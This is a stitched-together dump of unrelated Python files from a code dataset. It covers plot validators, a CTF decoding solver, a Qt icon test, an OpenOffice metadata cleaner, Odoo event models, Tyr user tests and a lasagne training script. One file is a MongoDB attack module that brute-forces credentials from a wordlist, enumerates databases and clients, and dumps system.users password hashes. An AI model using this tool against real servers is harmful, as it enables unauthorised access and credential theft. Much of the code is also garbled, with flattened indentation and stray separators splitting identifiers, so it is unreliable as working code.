def axis_name(axis, axname):
"""
Checks that an axis name is in ``{'x', 'y'}``. Raises an error on
an invalid value. Returns the lower case version of valid values.
"""
valid_args = ["x", "y"]
if axis.lower() not in valid_args:
msg = "Invalid value for {} ({}). Must be on of {}."
raise ValueError(msg.format(axname, axis, valid_args))
return axis.lower()
def fit_argument(arg, argname):
"""
Checks that an axis options is in ``{'x', y', 'both', None}``.
Raises an error on an invalid value. Returns the lower case version
of valid val | ues.
"""
valid_args = ["x", "y", "both", None]
if arg not in valid_args:
msg = "Invalid value for {} ({}). Must be on of {}."
raise ValueError(msg.format(argname, arg, valid_args))
elif arg is not None:
arg = arg.lower()
return arg
def axis_type(a | xtype):
"""
Checks that a valid axis type is requested.
- *pp* - percentile axis
- *qq* - quantile axis
- *prob* - probability axis
Raises an error on an invalid value. Returns the lower case version
of valid values.
"""
if axtype.lower() not in ["pp", "qq", "prob"]:
raise ValueError("invalid axtype: {}".format(axtype))
return axtype.lower()
def axis_label(label):
"""
Replaces None with an empty string for axis labels.
"""
return "" if label is None else label
def other_options(options):
"""
Replaces None with an empty dict for plotting options.
"""
return dict() if options is None else options.copy()
def estimator(value):
if value.lower() in ["res", "resid", "resids", "residual", "residuals"]:
msg = "Bootstrapping the residuals is not ready yet"
raise NotImplementedError(msg)
elif value.lower() in ["fit", "values"]:
est = _bs_fit
else:
raise ValueError('estimator must be either "resid" or "fit".')
return est
|
Qwaz/solved-hacking-problem | sciencewar/2018/ezbt/solver.py | Python | gpl-2.0 | 990 | 0.00101 | import binascii
data = '''
D9 51 44 5C 65 D5 3D 7D C8 67 BC 68 C8 68 6F 3F
C8 64 3F 30 48 41 72 3F 75 C8 67 F4 68 48 B9 6E
7C C8 7F 3C 74 5C 74 3C 74 3C 5C 3C 74 3C 5C 77
48 FE E8 67 C8 49 48 48 48 48 48 48 48 48 48 48
71 43 00 00 00 00 00 00
'''
data = data.replace(' ', '')
data = data.replace('\n', '')
data = list(map(ord, binascii.unhexlify(data)))
def unbit(val, bitsize=8):
diff = []
for _ in | range(bitsize):
diff.append(val & 1)
val = val >> 1
last = 0
acc = 0
for i in range(bitsize - 1, -1, -1):
now = last ^ diff[i]
acc = (acc << 1) ^ now
last = now
return acc
length = len(data)
for i in range(0, length-8, 8):
acc = 0
shift = 0
for j in range(8):
acc += data[i+j] | << shift
shift += 8
acc = unbit(acc, 8 * 8)
for j in range(8):
data[i+j] = acc & 0xFF
acc = acc >> 8
for i in range(length):
data[i] = unbit(data[i])
print ''.join(map(chr, data))
|
Pardus-Linux/pds | pds/tests/test-pds.py | Python | gpl-2.0 | 2,879 | 0.003128 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Pardus Desktop Services Test-Suit
# Copyright (C) 2010, TUBITAK/UEKAE
# 2010 - Gökmen Göksel <gokmen:pardus.org.tr>
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation; either version 2 of the License, or (at your option)
# any later version.
import pds
from time import time
from PyQt4 import QtCore, QtGui
from pds.qiconloader import QIconLoader
class Ui_Test(object):
def setupUi(self, Test):
Test.setObjectName("Test")
Test.resize(460, 300)
self.gridLayout = QtGui.QGridLayout(Test)
self.gridLayout.setObjectName("gridLayout")
self.name = QtGui.Q | ComboBox(Test)
self.name.setObjectName("name")
self.name.setEditable(True)
self.gridLayout.addWidget(self.name, 0, 0, 1, 1)
self.size = QtGui.QComboBox(Test)
self.size.setObjectName("size")
self.size.setMaximumSize(QtCore.QSize(100, 16777215))
self.size.addItem("128")
self.size.addItem("64")
self. | size.addItem("48")
self.size.addItem("32")
self.size.addItem("22")
self.size.addItem("16")
self.gridLayout.addWidget(self.size, 0, 1, 1, 1)
self.getButton = QtGui.QPushButton(Test)
self.getButton.setText("Get Icon")
self.getButton.setMaximumSize(QtCore.QSize(100, 16777215))
self.gridLayout.addWidget(self.getButton, 0, 2, 1, 1)
self.label = QtGui.QLabel(Test)
self.label.setObjectName("label")
self.gridLayout.addWidget(self.label, 1, 0, 1, 3)
self.getButton.clicked.connect(self.showIcon)
QtCore.QMetaObject.connectSlotsByName(Test)
Pds = pds.Pds(debug = True)
# Force to use Default Session for testing
# Pds.session = pds.DefaultDe
self.loader = QIconLoader(Pds, debug = True)
completer = QtGui.QCompleter(self.loader._available_icons)
self.name.setCompleter(completer)
self.getButton.setShortcut("Return")
print "Desktop Session :", self.loader.pds.session.Name
print "Desktop Version :", self.loader.pds.session.Version
print "Icon Paths :", self.loader.iconDirs
print "Theme :", self.loader.themeName
def showIcon(self):
a = time()
print "Clicked !"
icons = unicode(self.name.currentText())
self.label.setPixmap(self.loader.load(icons.split(','),
self.size.currentText()))
print 'It took : ', time() - a
if __name__ == "__main__":
import sys
app = QtGui.QApplication(sys.argv)
Test = QtGui.QWidget()
a = time()
print "Started !"
ui = Ui_Test()
ui.setupUi(Test)
Test.show()
print 'It took : ', time() - a
sys.exit(app.exec_())
|
overxfl0w/Grampus-Forensic-Utils | Metadata/Documents/OpenOffice/cleanopenoffi.py | Python | gpl-2.0 | 4,193 | 0.00787 | from tempfile import mkdtemp
from zipfile import ZipFile, is_zipfile
from shutil import rmtree, copyfileobj
from xml.dom.minidom import parse
import os
class cleanopenoffi():
def __init__(self, sDocName, newDocName):
self.sDocName = sDocName
self.newDocName = newDocName
self._ms_do()
def _ms_do(self):
#uncompressing
if self.__uncompress():
#cleaning xml files
self._xml_cleaner()
self._xml_extra_cleaner()
#compressing , adding and deleting
self.__compress()
self._meta_adder()
else:
print "An error has ocurred uncompressing"
sys.exit(0)
def __uncompress(self):
#uncompressing metadata containers
if not is_zipfile(self.sDocName):
return False
buff = ZipFile(self.sDocName, 'r')
for i in buff.namelist():
if i in ('meta.xml', 'content.xml', 'settings.xml'):
filename = os.path.basename(i)
source = buff.open(i)
target = file(os.path.join(filename), 'wb')
copyfileobj(source, target)
source.close()
target.close()
return True
def _xml_cleaner(self):
dom = parse(os.path.join('meta.xml'))
metalist = ['meta:creation-date',
'dc:date',
'meta:editing-cycles',
'meta:editing-duration',
'meta:generator',
'dc:title',
'dc:description',
'meta:keyword',
'dc:language',
'meta:initial-creator',
'dc:creator']
#cleaning tags values
for i in metalist:
try:
for a in dom.getElementsByTagName(i):
a.childNodes[0].nodeValue = ""
except:
print "Error, tagname not found"
sys.exit(0)
#Saving in meta.xml
f = open(os.path.join('meta.xml'), 'w')
dom.writexml(f)
f.close()
def _xml_extra_cleaner(self):
#cleaning tags values in content.xml
content = parse(os.path.join('content.xml'))
content_tag = content.getElementsByTagName("text:a")
for node in content_tag:
try:
node.setAttribute('xlink:href', str(''))
except:
print "Error, tagname not found"
sys.exit(0)
f = open(os.path.join('content.xml'), 'w')
content.writexml(f)
f.close()
#cleaning tags values in settings.xml(WILL MUST CORRECT IT)
#PENDING A FIX FOR IT(when we have more time)
"""
settings = parse(os.path.join('settings.xml'))
settings_tag = settings.getElementsByTagName("config:config-item")
for another_node in settings_tag:
try:
| another_node.setAttribute('config:name', str(''))
except:
print "An error has ocurred, but not is very important, you can continue"
j = open(os.path.join('settings.xml'), 'w')
settings.writexml(j)
j.close()
"""
def __compress(self):
zf = ZipFile(self.sDocName, 'r')
zp = Zi | pFile(self.newDocName, 'w')
for item in zf.infolist():
try:
#triying to write a new document without meta,content & settings .xml
buffer = zf.read(item.filename)
if (item.filename[-8:] != 'meta.xml') and (item.filename[-11:] != 'content.xml') and (item.filename[-12:] != 'settings.xml'):
zp.writestr(item, buffer)
except:
print "Can't write"
sys.exit(0)
zf.close()
zp.close()
def _meta_adder(self):
zf = ZipFile(self.newDocName, 'a')
zf.write('meta.xml')
zf.write('content.xml')
zf.write('settings.xml')
zf.close()
#deleting container files
os.remove('meta.xml')
os.remove('content.xml')
os.remove('settings.xml')
cleanopenoffi("test.odt","test2.odt")
|
smartdevicelink/sdl_ios | generator/transformers/structs_producer.py | Python | bsd-3-clause | 1,726 | 0.001738 | """
Structs transformer
"""
import logging
from collections import OrderedDict
from model.struct import Struct
from transformers.common_producer import InterfaceProducerCommon
class StructsProducer(InterfaceProducerCommon):
"""
Structs transformer
"""
def __init__(self, struct_class, enum_names, struct_names, key_words):
super(StructsProducer, self).__init__(enum_names=enum_names, struct_names=struct_names, key_words=key_words)
self._container_name = 'members'
self.struct_class = struct_class
self.logger = logging.getLogger(self.__class__.__name__)
@property
def container_name(self):
return self._container_name
def transform(self, item: Struct, render: dict = None) -> dict:
"""
Main entry point for transforming each Enum/Function/Struct into output dictionary,
which going to be applied to Jinja2 template
:param item: instance of Enum/Function/Struct
:param render: dictionary with pre filled entries, which going to be filled/changed by reference
:return: dictionary which going to be applied to Jinja2 template
"""
item.name = self._replace_sync(item.name)
name = 'SDL' + item.name
imports = {'.h': {'enum': set(), 'struct': set()}, '.m': set()}
imports['.h']['enum | '].add(self.struct_class)
if not render:
render = OrderedDict()
render['origin'] = item.name
| render['name'] = name
render['extends_class'] = self.struct_class
render['imports'] = imports
render['history'] = item.history
super(StructsProducer, self).transform(item, render)
return render
|
WoodNeck/tataru | test/__init__.py | Python | mit | 64 | 0.015625 | import sys
import | os
sys.path.append(os.path.ab | spath(os.curdir)) |
kadhikari/navitia | source/tyr/tests/integration/users_test.py | Python | agpl-3.0 | 24,886 | 0.002572 | # coding: utf-8
# Copyright (c) 2001-2018, Canal TP and/or its affiliates. All rights reserved.
#
# This file is part of Navitia,
# the software to build cool stuff with public transport.
#
# powered by Canal TP (www.canaltp.fr).
# Help us simplify mobility and open public transport:
# a non ending quest to the responsive locomotion way of traveling!
#
# LICENCE: This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
| # the Free Software Foundation, either ve | rsion 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Stay tuned using
# twitter @navitia
# IRC #navitia on freenode
# https://groups.google.com/d/forum/navitia
# www.navitia.io
from __future__ import absolute_import, print_function, division
from tests.check_utils import api_get, api_post, api_delete, api_put, _dt
import json
import pytest
import mock
from navitiacommon import models
from tyr.rabbit_mq_handler import RabbitMqHandler
from tyr import app
import urllib
@pytest.fixture
def geojson_polygon():
return {
"type": "Feature",
"geometry": {
"type": "Polygon",
"coordinates": [
[[100.0, 0.0], [101.0, 0.0], [101.0, 1.0],
[100.0, 1.0], [100.0, 0.0]]
]
}
}
@pytest.fixture
def geojson_multipolygon():
return {
"type": "Feature",
"geometry": {
"type": "MultiPolygon",
"coordinates": [
[[[102.0, 2.0], [103.0, 2.0], [103.0, 3.0], [102.0, 3.0], [102.0, 2.0]]],
[[[100.0, 0.0], [101.0, 0.0], [101.0, 1.0], [100.0, 1.0], [100.0, 0.0]],
[[100.2, 0.2], [100.8, 0.2], [100.8, 0.8], [100.2, 0.8], [100.2, 0.2]]]
]
}
}
@pytest.fixture
def invalid_geojsonfixture():
return {
"type": "Feature",
"geometry": {
"type": "Point",
"coordinates": []
}
}
@pytest.fixture
def create_user(geojson_polygon):
with app.app_context():
user = models.User('test', 'test@example.com')
user.end_point = models.EndPoint.get_default()
user.billing_plan = models.BillingPlan.get_default(user.end_point)
user.shape = json.dumps(geojson_polygon)
models.db.session.add(user)
models.db.session.commit()
return user.id
@pytest.fixture
def create_user_without_shape():
with app.app_context():
user = models.User('test', 'test@example.com')
user.end_point = models.EndPoint.get_default()
user.billing_plan = models.BillingPlan.get_default(user.end_point)
models.db.session.add(user)
models.db.session.commit()
return user.id
@pytest.fixture
def create_instance():
with app.app_context():
instance = models.Instance('instance')
models.db.session.add(instance)
models.db.session.commit()
return instance.id
@pytest.yield_fixture
def mock_rabbit():
with mock.patch.object(RabbitMqHandler, 'publish') as m:
yield m
@pytest.fixture
def create_multiple_users(request, geojson_polygon):
with app.app_context():
end_point = models.EndPoint()
end_point.name = 'myEndPoint'
billing_plan = models.BillingPlan()
billing_plan.name = 'free'
billing_plan.end_point = end_point
user1 = models.User('foo', 'foo@example.com')
user1.end_point = end_point
user1.billing_plan = billing_plan
user1.shape = json.dumps(geojson_polygon)
user2 = models.User('foodefault', 'foo@example.com')
user2.end_point = models.EndPoint.get_default()
user2.billing_plan = models.BillingPlan.get_default(user2.end_point)
models.db.session.add(end_point)
models.db.session.add(billing_plan)
models.db.session.add(user1)
models.db.session.add(user2)
models.db.session.commit()
# we end the context but need to keep some id for later (object won't survive this lost!)
d = {'user1': user1.id, 'user2': user2.id, 'end_point': end_point.id, 'billing_plan': billing_plan.id}
# we can't truncate end_point and billing_plan, so we have to delete them explicitly
def teardown():
with app.app_context():
end_point = models.EndPoint.query.get(d['end_point'])
billing_plan = models.BillingPlan.query.get(d['billing_plan'])
models.db.session.delete(end_point)
models.db.session.delete(billing_plan)
models.db.session.commit()
request.addfinalizer(teardown)
return d
@pytest.fixture
def create_billing_plan():
with app.app_context():
billing_plan = models.BillingPlan(name='test', max_request_count=10, max_object_count=100,
end_point_id=models.EndPoint.get_default().id)
models.db.session.add(billing_plan)
models.db.session.commit()
return billing_plan.id
def test_get_users_empty():
resp = api_get('/v0/users/')
assert resp == []
def test_add_user_without_shape(mock_rabbit):
"""
creation of a user without shape
When we get this user, we should see
shape = None and has_shape = False
"""
user = {'login': 'user1', 'email': 'user1@example.com'}
data = json.dumps(user)
resp = api_post('/v0/users/', data=data, content_type='application/json')
def check(u):
gen = (k for k in user if k != 'shape')
for k in gen:
assert u[k] == user[k]
assert u['end_point']['name'] == 'navitia.io'
assert u['type'] == 'with_free_instances'
assert u['block_until'] is None
check(resp)
assert resp['shape'] is None
assert resp['has_shape'] is False
assert mock_rabbit.called
# we did not give any coord, so we don't have some
assert resp['default_coord'] is None
# with disable_geojson=true by default
resp = api_get('/v0/users/')
assert len(resp) == 1
check(resp[0])
assert resp[0]['shape'] is None
assert resp[0]['has_shape'] is False
# with disable_geojson=false
resp = api_get('/v0/users/?disable_geojson=false')
assert len(resp) == 1
check(resp[0])
assert resp[0]['shape'] is None
assert resp[0]['has_shape'] is False
def test_add_user(mock_rabbit, geojson_polygon):
"""
creation of a user passing arguments as a json
"""
coord = '2.37730;48.84550'
user = {'login': 'user1', 'email': 'user1@example.com', 'shape': geojson_polygon, 'has_shape': True,
'default_coord': coord}
data = json.dumps(user)
resp = api_post('/v0/users/', data=data, content_type='application/json')
def check(u):
gen = (k for k in user if k != 'shape')
for k in gen:
assert u[k] == user[k]
assert u['end_point']['name'] == 'navitia.io'
assert u['type'] == 'with_free_instances'
assert u['block_until'] is None
check(resp)
assert resp['shape'] == geojson_polygon
assert resp['default_coord'] == coord
resp = api_get('/v0/users/')
assert len(resp) == 1
check(resp[0])
assert resp[0]['shape'] == {}
assert mock_rabbit.called
def test_add_user_with_multipolygon(mock_rabbit, geojson_multipolygon):
"""
creation of a user with multipolygon shape
status must be 200 when bragi will accept multipolygon shape
"""
user = {'login': 'user1', 'email': 'user1@example.com', 'shape': geojson_multipolygon, 'has_shape': True}
data = json.dumps(user)
resp, status = api_post('/v0/users/', check=False, data=data, content_type='application/json')
assert status == 400
assert mock_rabbit.call_count == 0
def test_add |
ajinabraham/Nosql-Exploitation-Framework | dbattacks/mongoattacks.py | Python | bsd-3-clause | 11,573 | 0.003111 | # Mongo Attack file
import threading
import pymongo
from pymongo import MongoClient
from termcolor import colored
from dbattacks.utils import screenshot
import requests
global passfound
def mongo_conn(target, port=27017, mass=False):
"""
Establishes Connection with MongoDB and Determines whether alive or not and returns the connection object
"""
try:
# Moved to MongoClient since Connection is Deprecated
conn = MongoClient(str(target), port)
# db = conn['test']
if mass and conn.database_names(): # Checks when mass scan of a IP List is provided
print colored("[+] MongoDB port open on " + target + ":27017!\n", 'green')
elif conn.database_names():
print colored("[+] MongoDB port open on " + target + ":27017!\n", 'green')
return conn
except pymongo.errors.OperationFailure:
if mass:
print colored("[+] MongoDB port open " + target + ":27017 \n", 'green')
else:
print colored("[+] MongoDB port open " + target + ":27017 \n", 'green')
return conn
# sys.exit()
except pymongo.errors.ConnectionFailure:
if mass:
print colored("[+] MongoDB port closed " + target + ":27017 \n", 'red')
else:
print colored("[-] MongoDB port closed. \n", 'red')
# sys.exit()
def dict_mongo(file_name, target, port=27017, db='admin'):
"""
Used to For Dictionary Attack on MongoDB reads from Dictionary of format 'username:password'
By default Dictionary attacks for admin DB
Multithreaded the Module
"""
t1 = ""
print colored("[-] Dictionary Attack Module | For NoSQL Framework Launched .. \n", 'blue')
conn = MongoClient(target, port)
try:
db = conn[db] # Use admin by Default
file = open(file_name, "r")
lines = file.read().split('\n')
for names in lines:
# s1 = names
t1 = threading.Thread( | target=tryandgetpass, args=(db, names))
t1.start()
if passfound:
print colored(passfound, 'green')
else:
print colored("[-] Password Not found in the File Specified", 'red')
except Exception, e:
print colored(str(e), 'red')
# Module to try mongo authentication
def tryandgetpass(db, names):
global passfound
passfound = ""
try:
if names:
db.authenticate(names.split(':')[0], names.split(':')[1])
# print colored("[+] Auth Succeeded with username:%s and Password
# %s"%(names.split(':')[0],names.split(':')[1]),'green')
passfound = "[+] Auth Succeeded with username:%s and Password %s" % (
names.split(':')[0], names.split(':')[1])
else:
pass
except pymongo.errors.OperationFailure:
print colored("[-] Auth Failed with username:%s and Password %s" % (names.split(':')[0], names.split(':')[1]), 'red')
# Checks for Mongo Web Interface
def mongo_web_interface(target, port=28017, creds=False, enableScreen=False):
try:
url = 'http://' + target + ':' + str(port)
code = requests.get(url)
if code.status_code == 200 and code.content.find('mongo') != -1 and code.content.find('db version') != -1:
print colored("\n[+] MongoDB web management open at " + url + ". No authentication required!", 'blue')
rest_url = url + '/buildInfo?text=1'
testrest = requests.get(rest_url)
if testrest.content.find('not enabled') != -1:
print colored("\n[-] REST Interface Not enabled", 'red')
else:
print colored("\n[+] REST Interface Enabled URL: " + rest_url, 'green')
if enableScreen:
screenshot(url, creds)
elif code.status_code == 401:
print colored("[-] MongoDB web management Open at " + url + ". Authentication required!", 'blue')
print colored("[-] Try Supplying credentials using the Auth option", 'blue')
print colored("[-] Do you Want to Take a ScreenShot of the Page (y/n)", 'yellow')
# choice = raw_input()
if enableScreen:
screenshot(url, creds)
else:
pass
else:
print colored("[-] Web Interface Not Open", 'red')
except Exception, e:
print str(e)
def mongo_enum(conn, creds=False, authall=False, sel_db='admin', collection=False, dump=False, limit=0, file_write=False):
"""
Mongo Enumeration phase. Determines version and Clients Connected.
Dumps the Available Databases and collections
Default Uses admin database to grab credentials
"""
#temp_db = sel_db
print colored("[+] Enumeration Module For NoSQL Framework Launched .. \n", 'blue')
if authall:
creds = authall
sel_db = 'admin'
if creds:
db = conn[sel_db]
try:
db.authenticate(creds.split(':')[0], creds.split(':')[1])
print colored("[-] Retrying with Supplying Credentials", 'green')
except pymongo.errors.OperationFailure:
print colored("\t[-] Authentication Failed with Credentials " + creds, 'red')
fail = True
print sel_db
fail = False
further = True
nodoc = False
done = False
db = conn[sel_db]
client = db.current_op('true')
print colored("[!] Server Info: \n", 'yellow')
serverInfo = conn.server_info()
for keys in serverInfo:
print colored("\t[-]" + (keys) + ":" + str(serverInfo[keys]), 'green')
print "\n"
print colored("[+] Checking for the Command Line Arguments", 'green')
try:
db = conn['admin']
cmdargs = db.command('getCmdLineOpts')
# print cmdargs
for i in cmdargs:
print colored("\t[+] " + i + ":" + str(cmdargs.get(i)), 'green')
db = conn[sel_db]
except Exception as e:
print colored("\t [-] Failed Exception : " + str(e), 'red')
if not client.get('err'):
print colored("[!] Clients Connected: ", 'yellow')
for i in client['inprog']:
try:
print colored("\t[-]" + i['client'], 'green')
except KeyError, e:
pass
print "\n"
else:
print colored("[!] Could not Fetch Clients Connected \n", 'yellow')
print colored("\t[-] Unauthorized Supply Creds \n", 'red')
# Code inspired from NoSQLMAP(kudos to the developer and a sincere apology
# for the late)
try:
print colored("[!] List of databases:", 'blue')
dbList = conn.database_names()
for i in dbList:
print colored("\t[+]" + i, 'green')
except Exception as e:
print colored("\t[-] Error Occured:" + str(e), 'red')
further = False
try:
if sel_db:
db = conn[sel_db]
colls = db.collection_names()
if colls:
print colored("\t[-] " + sel_db + ":", 'magenta')
else:
print colored("[-] admin DB does not have any Collections\n", 'yellow')
for i in colls:
try:
print colored("\t\t[-]" + i, 'green')
if 'system.users' in colls:
users = list(db.system.users.find())
print colored("\n[!] Found system.users for '" + sel_db + "' Checking for Users and Password Hashes:", 'yellow')
print colored("\n[+] Found '" + sel_db + "' Users and Password Hashes:", 'blue')
print colored("[-]" + str(users), 'green')
print "\n"
except Exception as e:
print str(e)
print colored("[-] not authorized to query the system.users spaces", 'red')
done = True
if dump:
db = conn[sel_db]
if collection in db.collection_names():
coll = db[collection]
else:
print colored('[-] Invalid Collection Name', 'red')
print colored("\n[+] Dumping '" |
chienlieu2017/it_management | odoo/addons/event_sale/models/event.py | Python | gpl-3.0 | 7,511 | 0.005059 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import api, fields, models, _
from odoo.exceptions import ValidationError
import odoo.addons.decimal_precision as dp
class Event(models.Model):
_inherit = 'event.event'
def _default_tickets(self):
product = self.env.ref('event_sale.product_product_event', raise_if_not_found=False)
if not product:
return self.env['event.event.ticket']
return [{
'name': _('Registration'),
'product_id': product.id,
'price': 0,
}]
event_ticket_ids = fields.One2many('event.event.ticket', 'event_id', string='Event Ticket',
default=lambda self: self._default_tickets(), copy=True)
class EventTicket(models.Model):
_name = 'event.event.ticket'
_description = 'Event Ticket'
def _default_product_id(self):
return self.env.ref('event_sale.product_product_event', raise_if_not_found=False)
name = fields.Char(string='Name', required=True, translate=True)
event_id = fields.Many2one('event.event', string="Event", required=True, ondelete='cascade')
product_id = fields.Many2one('product.product', string='Product',
required=True, domain=[("event_ok", "=", True)], default=_default_product_id)
registration_ids = fields.One2many('event.registration', 'event_ticket_id', string='Registrations')
price = fields.Float(string='Price', digits=dp.get_precision('Product Price'))
deadline = fields.Date(string="Sales End")
is_expired = fields.Boolean(string='Is Expired', compute='_compute_is_expired')
price_reduce = fields.Float(string="Price Reduce", compute="_compute_price_reduce", digits=dp.get_precision('Product Price'))
# seats fields
seats_availability = fields.Selection([('limited', 'Limited'), ('unlimited', 'Unlimited')],
string='Available Seat', required=True, store=True, compute='_compute_seats', default="limited")
seats_max = fields.Integer(string='Maximum Available Seats',
help="Define the number of available tickets. If you have too much registrations you will "
"not be able to sell tickets anymore. Set 0 to ignore this rule set as unlimited.")
seats_reserved = fields.Integer(string='Reserved Seats', compute='_compute_seats', store=True)
seats_available = fields.Integer(string='Available Seats', compute='_compute_seats', store=True)
seats_unconfirmed = fields.Integer(string='Unconfirmed Seat Reservations', compute='_compute_seats', store=True)
seats_used = fields.Integer(compute='_compute_seats', store=True)
@api.multi
def _compute_is_expired(self):
for record in self:
if record.deadline:
current_date = fields.Date.context_today(record.with_context({'tz': record.event_id.date_tz}))
record.is_expired = record.deadline < current_date
else:
record.is_expired = False
@api.multi
def _compute_price_reduce(self):
for record in self:
product = record.product_id
discount = product.lst_price and (product.lst_price - product.price) / product.lst_price or 0.0
record.price_reduce = (1.0 - discount) * record.price
@api.multi
@api.depends('seats_max', 'registration_ids.state')
def _compute_seats(self):
""" Determine reserved, available, reserved but unconfirmed and used seats. """
# initialize fields to 0 + compute seats availability
for ticket in self:
ticket.seats_availability = 'unlimited' if ticket.seats_max == 0 else 'limited'
ticket.seats_unconfirmed = ticket.seats_reserved = ticket.seats_used = ticket.seats_available = 0
# aggregate registrations by ticket and by state
if self.ids:
state_field = {
'draft': 'seats_unconfirmed',
'open': 'seats_reserved',
'done': 'seats_used',
}
query = """ SELECT event_ticket_id, state, count(event_id)
FROM event_registration
WHERE event_ticket_id IN %s AND state IN ('draft', 'open', 'done')
GROUP BY event_ticket_id, state
"""
self.env.cr.execute(query, (tuple(self.ids),))
for event_ticket_id, state, num in self.env.cr.fetchall():
ticket = self.browse(event_ticket_id)
ticket[state_field[state]] += num
# compute seats_available
for ticket in self:
if ticket.seats_max > 0:
ticket.seats_available = ticket.seats_max - (ticket.seats_reserved + ticket.seats_used)
@api.multi
@api.constrains('registration_ids', 'seats_max')
def _check_seats_limit(self):
for record in self:
if record.seats_max and record.seats_available < 0:
raise ValidationError(_('No more available seats for the ticket'))
@api.onchange('product_id')
def _onchange_product_id(self):
self.price = self.product_id.list_price or 0
class EventRegistration(models.Model):
_inherit = 'event.registration'
event_ticket_id = fields.Many2one('event.event.ticket', string='Event Ticket')
# in addition to origin generic fields, add real relational fields to correctly
# handle attendees linked to sale orders and their lines
# TDE FIXME: maybe add an onchange on sale_order_id + origin
sale_order_id = fields.Many2one('sale.order', string='Source Sale Order', ondelete='cascade')
sale_order_line_id = fields.Many2one('sale.order.line', string='Sale Order Line', ondelete='cascade')
@api.multi
@api.constrains('event_ticket_id', 'state')
def _check_ticket_seats_limit(self):
for record in self:
if record.event_ticket_id.seats_max and record.event_ticket_id.seats_available < 0:
raise ValidationError(_('No more available seats for this ticket'))
@api.multi
| def _check_auto_confirmation(self):
res = super(EventRegistration, self)._check_auto_c | onfirmation()
if res:
orders = self.env['sale.order'].search([('state', '=', 'draft'), ('id', 'in', self.mapped('sale_order_id').ids)], limit=1)
if orders:
res = False
return res
@api.model
def create(self, vals):
res = super(EventRegistration, self).create(vals)
if res.origin or res.sale_order_id:
res.message_post_with_view('mail.message_origin_link',
values={'self': res, 'origin': res.sale_order_id},
subtype_id=self.env.ref('mail.mt_note').id)
return res
@api.model
def _prepare_attendee_values(self, registration):
""" Override to add sale related stuff """
line_id = registration.get('sale_order_line_id')
if line_id:
registration.setdefault('partner_id', line_id.order_id.partner_id)
att_data = super(EventRegistration, self)._prepare_attendee_values(registration)
if line_id:
att_data.update({
'event_id': line_id.event_id.id,
'event_id': line_id.event_id.id,
'event_ticket_id': line_id.event_ticket_id.id,
'origin': line_id.order_id.name,
'sale_order_id': line_id.order_id.id,
'sale_order_line_id': line_id.id,
})
return att_data
|
rafaelvalle/MDI | nnet_lasagne.py | Python | mit | 10,609 | 0.000189 | # code adapted from lasagne tutorial
# http://lasagne.readthedocs.org/en/latest/user/tutorial.html
import time
import os
from itertools import product
import numpy as np
from sklearn.cross_validation import KFold
import theano
from theano import tensor as T
import lasagne
from params import nnet_params_dict, feats_train_folder
def set_trace():
from IPython.core.debugger import Pdb
import sys
Pdb(color_scheme='Linux').set_trace(sys._getframe().f_back)
def build_network(input_var, input_shape, nonlins, depth=2,
widths=(1000, 1000, 10), drops=(0.2, 0.5)):
"""
Parameters
----------
input_var : Theano symbolic variable or None (default: None)
Variable representing a network input.
input_shape : tuple of int or None (batchsize, rows, cols)
input_shape of the input. Any element can be set to None to indicate
that dimension is not fixed at compile time
"""
# GlorotUniform is the default mechanism for initializing weights
for i in range(depth):
if i == 0:
network = lasagne.layers.InputLayer(shape=input_shape,
input_var=input_var)
else:
network = lasagne.layers.DenseLayer(network,
widths[i],
nonlinearity=nonlins[i])
if drops[i] != None:
network = lasagne.layers.DropoutLayer(network, p=drops[i])
return network
def floatX(X):
return np.asarray(X, dtype=theano.config.floatX)
def zerosX(X):
return np.zeros(X, dtype=theano.config.floatX)
def init_weights(shape):
return theano.shared(floatX(np.random.randn(*shape) * 0.01))
def sgd(cost, params, gamma):
grads = T.grad(cost=cost, wrt=params)
updates = []
for p, g in zip(params, grads):
updates.append([p, p - g * gamma])
return updates
def model(X, w_h, w_o):
h = T.nnet.sigmoid(T.dot(X, w_h))
pyx = T.nnet.softmax(T.dot(h, w_o))
return pyx
def iterate_minibatches(inputs, targets, batchsize, shuffle=False):
assert len(inputs) == len(targets)
if shuffle:
indices = np.arange(len(inputs))
np.random.shuffle(indices)
for start_idx in range(0, len(inputs) - batchsize + 1, batchsize):
if shuffle:
excerpt = indices[start_idx:start_idx + batchsize]
else:
excerpt = slice(start_idx, start_idx + batchsize)
yield inputs[excerpt], targets[excerpt]
def batch_ids(batch_size, x_train, train_idx):
# change to iterator
ids = zip(range(0, len(x_train[train_idx]), batch_size),
range(batch_size, len(x_train[train_idx]), batch_size))
return ids
verbose = True
# train on every perturbed dataset
filepaths = np.loadtxt("include_data.csv", dtype=object, delimiter=",")
for (include, train_filename, test_filename) in filepaths:
if include == '1':
print '\nExecuting {}'.format(train_filename)
# Load training and test sets
x_train = np.load(os.path.join(feats_train_folder,
train_filename)).astype(np.float32)
y_train = x_train[:, -1].astype(int)
# y_train = (np.eye(2, dtype=np.float32)[x_train[:,-1].astype(int)])
# remove label column from x_train
x_train = x_train[:, :-1]
# Network topology
n_obs = x_train.shape[0]
n_inputs = x_train.shape[1]
n_outputs = len(np.unique(y_train))
# Cross-validation and Neural Net parameters
n_folds = nnet_params_dict['n_folds']
alphas = nnet_params_dict['alphas']
gammas = nnet_params_dict['gammas']
decay_rate = nnet_params_dict['decay_rate']
batch_sizes = nnet_params_dict['batch_sizes']
max_epoch = nnet_params_dict['max_epoch']
depth = nnet_params_dict['depth']
widths = nnet_params_dict['widths']
nonlins = nnet_params_dict['nonlins']
d | rops = nnet_params_dict['drops']
# Dictionary to store results
results_dict = {}
params_mat = [x for x in product(alphas, gammas, batch_sizes)]
params_mat = np.array(params_mat, dtype=theano.config.floatX)
params_mat = np.column_stack((param | s_mat,
zerosX(params_mat.shape[0]),
zerosX(params_mat.shape[0]),
zerosX(params_mat.shape[0])))
for param_idx in xrange(params_mat.shape[0]):
# load parameters for neural network model
alpha = params_mat[param_idx, 0]
gamma = params_mat[param_idx, 1]
batch_size = int(params_mat[param_idx, 2])
shape = (batch_size, x_train.shape[1])
# choose n_hidden nodes according to ...
